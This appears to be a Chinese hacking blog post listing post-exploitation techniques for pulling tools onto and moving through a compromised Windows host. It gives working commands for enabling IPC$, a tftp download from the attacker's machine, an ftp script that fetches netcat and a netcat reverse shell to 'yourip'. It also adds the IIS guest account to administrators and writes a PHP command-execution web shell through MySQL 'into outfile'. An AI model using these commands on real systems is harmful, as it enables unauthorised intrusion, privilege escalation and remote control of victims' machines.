對於沒有開IPC$的主機 上傳下載的一些思路

 

 

比如用溢出攻擊得到權限 發現沒有開139 or 445 我們可以從內部make it崩潰：
1.net share ipc$
例如，使用webdav溢出得到system net share 看一下 沒有任何東西 用什麼東西都連不上 所以 要先打開ipc$——net share ipc$
剩下的你願意使用什麼就可以了，比如dameware.

2.tftp.exe
獲得sa空口令，使用sqlexec鏈接，只開了80和1433怎么辦？別忘了，你是在內部控制他，防火墻是可以從內部突破的。
打開本地的tftp server 然后在sqlexec中輸入
tftp -i yourip get files
就可以了。

3.ftp 腳本 + nc
比如從80端口溢出后可以，寫一個ftp的腳本然后用ftp -s ftp.txt從你的ftp下載nc。在溢出的命令提示符下使用nc
nc -e c:\winnt\system32\cmd.exe yourip 888
在本地命令提示符下
nc -l -p 888 -vv

4.iusr_xx 高權限的cmd.asp
有運氣的成分，80端口溢出，net localgroup administrators iusr_computername /add
用echo 寫一個cmd.asp……

5.使用mysql寫的cmd.php
我轉再過一篇文章 再貼一次
通過mysql入侵
1、在默認的mysql數據庫中生成一個叫tmp的表，只有一個字段名，叫cmd，數據類型為text（可以不分大

小寫）
use mysql
create table tmp(cmd text)
2、在tmp表cmd字段中寫入一段php代碼（注意這個文件導出后一定要叫cmd2.php）
insert into tmp values(<|><body onload=document.form1.cmd.focus()>
<?if (isset($cmd)){$cmd=stripslashes($cmd);exec(\"$cmd>temp.dat\");}?>
<style type=\"text.css\">
<!\-\-.form1
{background:#ffffff;border-bottom:#666666 1px solid;border-left:#666666 1px solid;border-

right:#666666 1px solid;border-top:#666666 1px solid;color:#3c464f;font-size:9pt;clip:rect

();cursor:text;height:auto;width:auto;margin-top:0px;margin-right:0px;margin-

bottom:0px;margin-left:0px}
\-\-></style><p class=\"title\"> </p><form name=\"form1\" method=\"post\"

action=\"/cmd2.php\"><input type=\"text\" name\"cmd\" size=\"50\" class=\"form1

\"></from><form name=\"\form2" method=\"post\" action=\"\"><p><textarea name=\"text\"

cols=\"120\" row=\"50\" class=\"form1\"><?if
(isset($cmd)){readfile(\"temp.dat\");unlink(\"text.dat\");}?></textarea></p></form></body>
寫入到你剛才看見的web實際目錄中（要注意的問題是直接寫到你剛才看到的路徑中可并不能直接訪問到

cmd2.php，你可以從里往外多試試）
select * form tmp into outfile <|>d:\\path\\cmd2.php<|>;
刪除 tmp表
drop table tmp;
3、訪問cmd2.php
這是你將得到的web shell是system身份的！

6.telnet
用opentelnet的腳本

7.同一防火墻內另一主機的輔助入侵
有時候一些主機使用的是硬防火墻，很多主機躲在一個防火墻下面，它們之間是彼此無保護的，如果你成功的入侵了一臺內網主機，你就可以實現向其他主機進軍。

8.一些發送到80端口的腳本
正在搜集……
9.正在想
……

 

文章來自: Tank部落格
引用通告: 查看所有引用 | 我要引用此文章
Tags: IPC$
相關日誌: